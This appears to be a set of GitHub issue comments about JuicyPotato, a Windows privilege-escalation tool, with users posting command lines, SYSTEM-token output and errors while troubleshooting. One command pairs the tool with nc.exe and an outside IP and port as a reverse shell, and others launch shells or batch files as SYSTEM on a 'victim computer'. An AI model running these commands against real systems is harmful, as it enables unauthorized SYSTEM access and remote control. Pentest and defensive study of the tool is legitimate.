Please provide also pre-compiled JuicyPotato x86

Using JP over a commandline-only session (like WinRM) means that, for example, simply spawning a new shell is unhelpful because it can't be accessed. Spawning it in the current shell could be helpful.

For science ;-)

after everything runs is doesnt executes the file i give
./juicypotato.exe -l 1234 -p C:\Users\Destitute\appdata\local\temp\nc.exe -a "cmd.exe 10.10.18.93 9005" -t * -c '{E48EDA45-43C6-48e0-9323-A7B2067D9CD5}'
Testing {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39} 1234
......
[+] authresult 0
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

after that nothing happens, ive tried given diferent bat files whatnot.. can anyone point me a better direction !

Is it possible to put the juici potato exploit on ps1 to be able to run it in powershell?

We can add a CLSID list for Windows Server 2019 too from https://github.com/antonioCoco/RemotePotato0#clsid-list

Hey. Im trying to pass an argument like '-url XYZ' but Juicy Potato interprets it as an option, if i use quotes or tildes, the quootes and tildes get passed as an argument. Please provide a fix or instructions on how I can workarond this.

C:\Users\ben\Documents>powershell ./GetCLSID.ps1
powershell ./GetCLSID.ps1

Name           Used (GB)     Free (GB) Provider      Root
----           ---------     --------- --------      ----
HKCR                                   Registry      HKEY_CLASSES_ROOT
Select : The property cannot be processed because the property "AppID" already
exists.
At C:\Users\ben\Documents\utils\Join-Object.ps1:471 char:103
+ ... htProperties | Select $AllProps
+                    ~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (@{AppID={8B4B43...-7F9F7DF414
   EA}}:PSObject) [Select-Object], PSArgumentException
    + FullyQualifiedErrorId : AlreadyExistingUserSpecifiedPropertyNoExpand,Mic
   rosoft.PowerShell.Commands.SelectObjectCommand

It worked fine when testing on Windows 10, and I am not good enough with Powershell to debug the issue.

.\jp.exe -p C:\users\Destitute\appdata\local\temp\rav.bat -l 9001 -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

something wrong ?

In effort to compile the 32 bit version of this awesome tool. I made some changes as shown below:-

Originally when I compile making no changes to project properties I got .dll output, then I change into exe but the final exe when I try to run would give me "this app can't run on your pc".

I still manged to move the seemingly broken exe to victim computer and when I run the

c:\inetpub\wwwroot>test_clsid.bat
test_clsid.bat
{1F7D1BE9-7A50-40b6-A605-C4F3696F49C0} 10000

Either I didn't compile it right, perhaps didn't include the right resource file or something else, If you can help me fix this I be glad. Thank you.

Binaries on https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts cannot be downloaded because of the retention policy. Could you look into making binaries available. Or just publish the latest release here under Releases.

Hi,
Who can connect to each listener? (The rpc and the com ones).

Is the com listener made for our rpc server connections only?

Thank you

@stvmillertime has suggested that potato has lost its meaning (https://twitter.com/stvemillertime/status/1204566587921117184) and I agree

I get an error "not a valid win32 application" when I try to run this on x64 Server 2008 R2

Hi,

I am having an issue when specifying the CLSID:

C:\Users\asdf\Desktop> ./JuicyPotato.exe -l 1337 -z -t * -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}          
Wrong Argument: -                                                                                                
JuicyPotato v0.1                                                                                                 
Mandatory args:                                                                                                  
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both                        
-p <program>: program to launch                                                                                  
-l <port>: COM server listen port                                                                                
Optional args:                                                                                                   
-m <ip>: COM server listen address (default 127.0.0.1)                                                           
-a <argument>: command line argument to pass to program (default NULL)                                           
-k <ip>: RPC server ip address (default 127.0.0.1)                                                               
-n <port>: RPC server listen port (default 135)                                                                  
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})                                        
-z only test CLSID and print token's user  

Works fine if I omit the -c {..} option.

Have you experienced this?

Hi,
I am trying to run the tool on a Windows 10 Enterprise 1809. I opened a terminal and used psexec64 to run a console under the nt authority\local service user and verified with Process Explorer that SeImpersonatePrivilege is enabled.

c:\>whoami
nt authority\local service

c:\>JuicyPotato.exe -l 6666 -p c:\windows\system32\cmd.exe -t u -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 6666
COM -> recv failed with error: 10038
c:\>net helpmsg 10038

An operation was attempted on something that is not a socket.

I also tried using the default CLSID with the same result. Any clue what I might be doing wrong?